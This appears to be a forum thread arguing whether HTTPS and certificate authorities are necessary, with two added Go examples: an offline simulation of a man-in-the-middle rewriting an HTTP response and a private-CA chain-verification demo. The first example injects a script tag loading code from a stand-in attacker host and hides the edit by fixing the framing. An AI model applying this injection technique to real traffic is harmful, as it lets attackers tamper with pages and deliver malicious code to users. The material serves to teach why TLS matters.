Not THE issuer. AN issuer. All of your devices have a number of trusted top-level issuers (Root certification authorities). Windows has about 50 preloaded, and this list largely matches what you'll find on Android, Mac, etc. Everyone's been mentioning Let's Encrypt, which descends from ISRG Root X1. But you can (relatively) easily get certs from Thawte, Verisign, and many others.
And if none of those are to your liking, you can install your own. Seriously, there's nothing technical stopping you. Most corporate devices (Windows, Mac, Linux; Android or iOS; mobile, client, server) have the company's root certs installed. The challenge for public trust is exactly that: trust. You must operate in a way that is generally trustworthy.
Let's Encrypt was actually pretty revolutionary. You aren't entirely off base with your concern. Prior to that, getting a cert that was trusted by most devices was non-trivial, and came with an expense. But that wasn't because of the desire for encryption. Rather, it was about verifying that you were who you said you were. These also served as proof of identity.
Some do. It depends on the type of certificate. Thankfully now we have Let's Encrypt, so there is a free alternative to the big CAs.
To answer your initial question - yes it is necessary. Without HTTPS or encryption in general, anybody who can intercept your connection can see everything you're doing.
A real world example of this is let's say you're connected to a WiFi network that has no password and are browsing a plain HTTP site. Open wifi networks are unencrypted, as is HTTP.
I can sit across the road in a vehicle, unseen, on a laptop and sniff the traffic to view what you're doing. If you log into your bank, I now have your credentials and can do what I like, and you don't even know.
This is why we need encryption. It is an (almost) guarantee that your traffic is only viewable to yourself and the other end of whatever you're connecting to and not anyone in the middle.
Edit: for anyone downvoting OP, remember this is nostupidquestions. Take the time to educate if you know better, but don't downvote "stupid" questions lol.
Do you take login credentials that could be skimmed and used for identity theft?
Maybe this one will strike home for people who think it’s a scam by The Man:
With no HTTPS, every single thing you do on the web can be monitored by your ISP’s automated tracking system and sold to data warehouses that then sell the data on to AI aggregators who can profile your activity to figure out how to shape your future behaviour based on how you responded in the past.
And HTTPS isn’t just about protecting secrets, it’s about validating the communication channel hasn’t been tampered with. Without it, anyone between you and your destination could be modifying what actually gets sent back to you, injecting anything from malware to slight changes in text content based on the above profiling info.
HTTPS is part of what keeps the web free and federated.
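As an added example, not code from any commenter here: the on-path tampering described in this reply, and the sniffing described in the open-WiFi reply above, are both possible only because plain HTTP puts the whole request and response on the wire in cleartext. The Go program below (standard library only) takes a constructed capture of a plain-HTTP response, rewrites it the way an attacker sitting between client and server could, and re-emits it with consistent framing so the client has nothing to flag. The host, page text and attacker URL are placeholders; how the attacker gets into that position (rogue access point, ARP spoofing, a compromised router) is outside the example. Under TLS the same attacker sees only ciphertext and any edit fails the record authentication check, which is the "tampering" half of the point.

```go
package main

import (
	"bufio"
	"bytes"
	"fmt"
	"io"
	"net/http"
	"strings"
)

// Constructed sample page body; the account and amount are placeholders.
const capturedBody = "<html><body><p>Deposit $10 to account 1234 today.</p></body></html>"

// CapturedResponse is a constructed plain-HTTP response as it would cross the wire.
// Everything an on-path attacker needs is right here, readable.
var CapturedResponse = "HTTP/1.1 200 OK\r\n" +
	"Content-Type: text/html; charset=utf-8\r\n" +
	fmt.Sprintf("Content-Length: %d\r\n\r\n", len(capturedBody)) +
	capturedBody

// TamperResponse models a man in the middle on unauthenticated traffic: parse the
// response, rewrite the body, then re-emit it with a Content-Length that matches
// the new body so the client cannot tell anything changed.
func TamperResponse(raw []byte, rewrite func(body string) string) ([]byte, error) {
	resp, err := http.ReadResponse(bufio.NewReader(bytes.NewReader(raw)), nil)
	if err != nil {
		return nil, err
	}
	body, err := io.ReadAll(resp.Body)
	resp.Body.Close()
	if err != nil {
		return nil, err
	}
	newBody := rewrite(string(body))
	resp.Body = io.NopCloser(strings.NewReader(newBody))
	resp.ContentLength = int64(len(newBody)) // fix the framing so the edit is invisible
	resp.Header.Del("Content-Length")

	var out bytes.Buffer
	if err := resp.Write(&out); err != nil {
		return nil, err
	}
	return out.Bytes(), nil
}

// InjectScript is the "malware" payload: a script tag pointing at an
// attacker-controlled host (placeholder URL) inserted before </body>.
func InjectScript(body string) string {
	return strings.Replace(body, "</body>",
		`<script src="http://attacker.invalid/x.js"></script></body>`, 1)
}

// ChangeAmount is the "slight change in text content" payload from the comment.
func ChangeAmount(body string) string {
	return strings.Replace(body, "$10 ", "$100 ", 1)
}

// ParseBody is the client side: read the response the way a browser would and
// report the body it got and the Content-Length it was told to expect.
func ParseBody(raw []byte) (body string, contentLength int64, err error) {
	resp, err := http.ReadResponse(bufio.NewReader(bytes.NewReader(raw)), nil)
	if err != nil {
		return "", 0, err
	}
	defer resp.Body.Close()
	b, err := io.ReadAll(resp.Body)
	if err != nil {
		return "", 0, err
	}
	return string(b), resp.ContentLength, nil
}

func main() {
	tampered, err := TamperResponse([]byte(CapturedResponse), func(b string) string {
		return InjectScript(ChangeAmount(b))
	})
	if err != nil {
		panic(err)
	}
	body, n, _ := ParseBody(tampered)
	fmt.Printf("client saw Content-Length %d for %d bytes of body:\n%s\n", n, len(body), body)
}
```

The client-side parse succeeds with no error because the attacker fixed up the framing; nothing in HTTP/1.1 itself binds the bytes to the origin. That binding is exactly what the TLS record layer adds.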
HTTP is like using a postcard, HTTPS is using a sealed envelope. Which would you use for your bank information?
The "third party gatekeeper" does more than just secure data, it also acts as a validation that your site is what it says it is. So if someone jacks your domain out from under you and hosts something totally different, people can tell that something's up.
But would you be OK taking all the stuff you write on those websites, and scrawling it on a giant chalkboard in your town square instead? One where anyone can see (or even change) what you've written?
I kind of get your frustration though. I set up my personal website precisely to get away from big platforms; yet my HTTPS is validated by Google. It feels like a defeat still having them involved in the process.
No, it is not a scam or like the TSA. (... which is of much less clear benefit, but that's a different story.)
Security that we never needed before, but now suddenly we do.
How do you figure? Dropping unsafe practices earlier would've been a great idea, it was just another item in the long list of "people suck at technology", that stuck around out of habit and sloppiness. HTTPS is not new, but for a long time it was much more acceptable to deal with plain unsafe solutions for many uses. Since setting up an HTTPS site for free got very, very easy, there just weren't many excuses left.
Now we’re dependent on a third party gatekeeper for permission to have a web site.
Sort of. By necessity, in a chain of trust, the buck has to stop somewhere, that's your root "authority". In some cases you just make your own on the logic that you trust yourself, or accept some other cert/authority as trusted, or tell the browser "yeah whatever, I know what I'm doing" if you know it's safe. The catch is that then, for any number of reasons, you can't necessarily know it's safe.
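As an added example, not code from any commenter here and not Let's Encrypt's or any CA's tooling: the "install your own root" idea from the earlier reply and the chain-of-trust point in this one, in Go using only the standard library. The CA name and host names are placeholders I chose. It builds a self-signed root, signs a server certificate with it, and then runs the same verification a browser does, under three conditions: the root is in the trust store and the name matches (accepted), the trust store does not contain the root (the self-signed warning), and the root is trusted but the name is wrong (what a client sees when a valid cert is served for a site it was not issued for).

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

// newKey makes a P-256 key; one for the private root, one for the site.
func newKey() *ecdsa.PrivateKey {
	k, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	return k
}

// BuildChain is the "trust yourself" case: create a self-signed root CA and use it
// to sign a server certificate for host. The CA name and host are placeholders.
func BuildChain(host string) (root, leaf *x509.Certificate) {
	rootKey, leafKey := newKey(), newKey()
	now := time.Now()

	rootTmpl := &x509.Certificate{
		SerialNumber:          big.NewInt(1),
		Subject:               pkix.Name{CommonName: "Example Private Root CA"},
		NotBefore:             now.Add(-time.Hour),
		NotAfter:              now.Add(10 * 365 * 24 * time.Hour),
		IsCA:                  true,
		BasicConstraintsValid: true,
		KeyUsage:              x509.KeyUsageCertSign | x509.KeyUsageCRLSign,
	}
	// Parent == template: the root signs itself. This is where "the buck stops".
	rootDER, err := x509.CreateCertificate(rand.Reader, rootTmpl, rootTmpl, &rootKey.PublicKey, rootKey)
	if err != nil {
		panic(err)
	}
	root, err = x509.ParseCertificate(rootDER)
	if err != nil {
		panic(err)
	}

	leafTmpl := &x509.Certificate{
		SerialNumber: big.NewInt(2),
		Subject:      pkix.Name{CommonName: host},
		DNSNames:     []string{host}, // browsers match the URL host against SANs, not the CN
		NotBefore:    now.Add(-time.Hour),
		NotAfter:     now.Add(90 * 24 * time.Hour),
		KeyUsage:     x509.KeyUsageDigitalSignature,
		ExtKeyUsage:  []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
	}
	// Signed by the root's key, so the leaf chains to the root and nowhere else.
	leafDER, err := x509.CreateCertificate(rand.Reader, leafTmpl, root, &leafKey.PublicKey, rootKey)
	if err != nil {
		panic(err)
	}
	leaf, err = x509.ParseCertificate(leafDER)
	if err != nil {
		panic(err)
	}
	return root, leaf
}

// Verify does what a browser does on connect: chain the leaf up to a root in the
// trust store, then check the host name. A nil error means "no warning page".
func Verify(leaf *x509.Certificate, trusted []*x509.Certificate, host string) error {
	pool := x509.NewCertPool() // an explicit, possibly empty store, not the OS one
	for _, c := range trusted {
		pool.AddCert(c)
	}
	_, err := leaf.Verify(x509.VerifyOptions{
		Roots:     pool,
		DNSName:   host,
		KeyUsages: []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
	})
	return err
}

func main() {
	root, leaf := BuildChain("intranet.example.internal")
	fmt.Println("root installed, right host:", Verify(leaf, []*x509.Certificate{root}, "intranet.example.internal"))
	fmt.Println("root not installed:        ", Verify(leaf, nil, "intranet.example.internal"))
	fmt.Println("root installed, wrong host:", Verify(leaf, []*x509.Certificate{root}, "bank.example.internal"))
}
```

The second case is the self-signed warning: the signature is mathematically fine, the device just has no reason to believe the signer. Pushing that root to every device you control turns the second case into the first, which is what corporate fleets do; the public web cannot, so it relies on the preloaded roots and on CAs that only issue after checking control of the name.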
It’s a move by the weasels-that-be to turn the Internet into yet another tool for profit and control.
No offense, are you sure you have the technical background required to know that?
The problem with TSA is that it reduces our privacy and dignity in exchange for security (that security may be theatre). HTTPS is different because it increases privacy which allows us to keep more dignity (security that is not theatre.)
TSA is like needing to strip so that your clothes don't get wet while going out in the rain, while HTTPS is like wearing a raincoat so your clothes don't get wet while going out in the rain.
Not sure I get this one. You can still run a website with http. Now it might alarm the browser and users. But you can do it.
As for certificates having been free but maybe not now: it's actually the other way round. As I recall, when HTTPS was pretty new the main way was via Verisign, and it was not cheap to get one.
The fact you could later get one for free for example via letsencrypt is what made it so everyone could run https (along with the changes that allow multiple certs on a single server with multiple domains).
If it became expensive to get certs again I'd bet a lot of hobbyist stuff would go back to http or self signed and browsers would need to tone down the warning. But, I cannot imagine that happening now. Having most sites encrypted is a good thing.
It's definitely not a scam. It does exactly what it should and is pretty good at it.
However, Google especially is pushing it on everything, even where it isn't needed: punishing search results if they don't enforce HTTPS, making it hard to access sites in Chrome, etc.
I have a static website that takes no user input whatsoever, thus https is pointless and a waste of compute power/energy.
In the end I see the biggest issue in not very tech-literate users thinking everything with HTTPS is legit and trustworthy, while it really isn't.
Now we’re dependent on a third party gatekeeper for permission to have a web site.
Source?
Even though most browsers would raise an alarm in the case of a self-signed certificate, you can still do it, and it's still more secure than no encryption.
I'd consider my internet browsing unknowingly being snooped on or having content injected as a benefit and not a scam.
The latest post from the Electronic Frontier Foundation, a digital freedom and privacy advocacy group touches on HTTPS, and how HTTPS becoming the norm is an improvement on privacy compared to the past.
I understand the issue of big tech being the authority, but I also see the benefit of hiding my data from ISP and snooping. There are practical p2p ways to make this work or even a federated authenticator but we are probably stuck with https for a long while yet